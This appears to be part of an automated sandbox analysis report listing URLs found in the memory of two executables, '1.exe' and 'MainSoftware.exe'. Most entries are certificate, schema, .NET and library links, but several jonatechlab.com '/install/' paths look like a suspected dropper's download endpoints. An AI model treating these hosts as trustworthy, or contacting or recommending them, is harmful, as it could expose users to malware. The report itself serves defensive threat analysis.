http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: MainSoftware.exe, 00000015.00000003.2229773115.000002BDCBA62000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.v
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: http://html4/loose.dtd
    Source: MainSoftware.exe, 00000010.00000002.2140289283.00000234A3045000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A3086000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A30B7000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A309A000.00000004.00001000.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140289283.00000234A3069000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://jonatechlab.com:443/
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
    Source: 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globa
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsig
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0P
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.IO
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemV
    Source: MainSoftware.exe, 00000010.00000002.2142815364.0000027538160000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/SystemY
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
    Source: 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2151399807.000002753B3D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151185629.000002753B3B1000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
    Source: MainSoftware.exe, 00000010.00000002.2151555653.000002753B3F7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2151813644.000002753B411000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamevhttp://schemas.xmlsoap.o
    Source: 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
    Source: 1.exe, 00000004.00000003.1317343303.000000000823B000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2230434035.0000000008B35000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2226638707.0000000008B32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261783516.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1596877787.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000D14D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.2247148881.000000000820F000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.2261993160.000000000A2F0000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517166138.0000000008B40000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515052828.00000000050E9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.2227216121.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1517145104.0000000008B39000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2228613960.00000000050CC000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000002.2229533139.0000000006B15000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 0000000B.00000003.1515074607.00000000050CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: 1.exe, 00000004.00000002.2261284310.0000000008180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha3lx
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
    Source: 1.exe, 00000004.00000003.1315095135.0000000009885000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.winimage.com/zLibDll
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/GlobalizationInvariantMode
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C576000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/binaryformatter
    Source: MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-core-applaunch?
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/com)
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehost
    Source: MainSoftware.exe, 00000010.00000002.2141123759.00000275358B3000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-illink/nativehostt
    Source: MainSoftware.exe, 00000015.00000002.2235519858.000002BDCB233000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000015.00000002.2261226768.000002BDD0B11000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet-warnings/
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/download%s%sInstall
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/info
    Source: 1.exe, 00000004.00000003.1588667153.000000000BB96000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000000.2065212179.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2167112591.00007FF7D943D000.00000002.00000001.01000000.0000000A.sdmpString found in binary or memory: https://aka.ms/dotnet/sdk-not-foundProbing
    Source: MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmpString found in binary or memory: https://aka.ms/nativeaot-compatibility
    Source: 1.exe, 00000004.00000003.1588667153.000000000C539000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141601509.0000027536021000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141547348.0000027536009000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED50000.00000002.00000001.00040000.0000000A.sdmpString found in binary or memory: https://github.com/FantasticFiasco/serilog-sinks-http.git
    Source: 1.exe, 00000004.00000003.1588667153.000000000C684000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dot
    Source: 1.exe, 00000004.00000003.1588667153.000000000C708000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C703000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C55A000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5EA000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C6B4000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000CA07000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C976000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9A5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9FD000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5B9000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5C5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5DB000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C66E000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C993000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C5D2000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C9EE000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C570000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C699000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C57D000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1588667153.000000000C961000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 
00000004.00000003.1588667153.000000000C9AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/blob/bbc898f3e5678135b242faeb6eefd8b24bf04f3c/src/native/corehost/
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/dotnet/runtime/issues/71847
    Source: MainSoftware.exe, 00000010.00000002.2142756269.0000027538147000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/dotnet/runtimeE
    Source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F5000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/dotnet/runtimeGk
    Source: MainSoftware.exe, 00000010.00000002.2143697931.00000275384F9000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/dotnet/runtimet
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/mono/linker/issues/378
    Source: MainSoftware.exe, 00000010.00000002.2140691802.00000275352BE000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141123759.0000027535751000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/mono/linker/pull/649
    Source: 1.exe, 00000004.00000003.1588667153.000000000C523000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2140213322.00000234A0741000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE0000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2140154271.00000234A070D000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog
    Source: 1.exe, 00000004.00000003.1588667153.000000000C534000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000010.00000002.2141475912.0000027535FE8000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2141529603.0000027535FF1000.00000020.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-formatting-compact
    Source: MainSoftware.exe, 00000010.00000002.2141547348.0000027536000000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-sinks-file
    Source: MainSoftware.exe, 00000010.00000002.2141547348.0000027536000000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://github.com/serilog/serilog-sinks-fileC
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com%/install/getfiles/
    Source: MainSoftware.exe, 00000010.00000002.2141451491.0000027535BE0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://jonatechlab.com/install/new
    Source: MainSoftware.exe, 00000010.00000002.2139786896.000002349ED61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000010.00000002.2139740826.000002349ED57000.00000002.00000001.00040000.0000000A.sdmp | String found in binary or memory: https://jonatechlab.com/install/whattoinstall/Ghttps://jonatechlab.com/install/new
